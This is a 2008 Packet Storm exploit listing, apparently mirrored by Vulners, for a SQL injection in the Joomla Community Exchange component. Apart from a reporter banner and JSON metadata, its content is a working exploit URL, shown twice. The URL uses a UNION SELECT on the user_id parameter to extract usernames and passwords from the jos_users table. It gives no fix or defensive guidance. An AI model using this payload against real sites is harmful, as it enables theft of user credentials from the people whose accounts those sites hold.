Search...

Joomla Community Exchange SQL Injection

2008-10-09T00:00:00

ID PACKETSTORM:70713
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-09T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component Community Exchange (user_id) SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] ModuleName: "Community Exchange"  
[~] Version: "1.0.0"   
[~] Author: "Mubashir Ahmad Waqar"  
[~] Author E-mail: "contact@intellectcs.com"  
[~] Author URL: "www.intellectcs.com"  
  
########################################  
  
[~] Exploit: /index.php?option=com_cx&task=showrating&user_id=[SQL]  
[~] Example: /index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:70713", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla Community Exchange SQL Injection", "description": "", "published": "2008-10-09T00:00:00", "modified": "2008-10-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/70713/Joomla-Community-Exchange-SQL-Injection.html", "reporter": "Valon Kerolli", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:15:59", "viewCount": 3, "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-11-03T10:15:59", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:15:59", "rev": 2}, "vulnersScore": 0.8}, "sourceHref": "https://packetstormsecurity.com/files/download/70713/joomlaexchange-sql.txt", "sourceData": "`############################################################################# \n# # \n# Joomla Component Community Exchange (user_id) SQL Injection Vulnerability # \n# # \n############################################################################# \n \n \n######################################## \n \n[~] Vulnerability found by: Valon Kerolli \n[~] Contact: valon[at]itshqip.com \n[~] Site: www.itshqip.com \n \n######################################## \n \n[~] ScriptName: \"Joomla\" \n[~] ModuleName: \"Community Exchange\" \n[~] Version: \"1.0.0\" \n[~] Author: \"Mubashir Ahmad Waqar\" \n[~] Author E-mail: \"contact@intellectcs.com\" \n[~] Author URL: \"www.intellectcs.com\" \n \n######################################## \n \n[~] Exploit: /index.php?option=com_cx&task=showrating&user_id=[SQL] \n[~] Example: /index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users-- \n \n`\n"}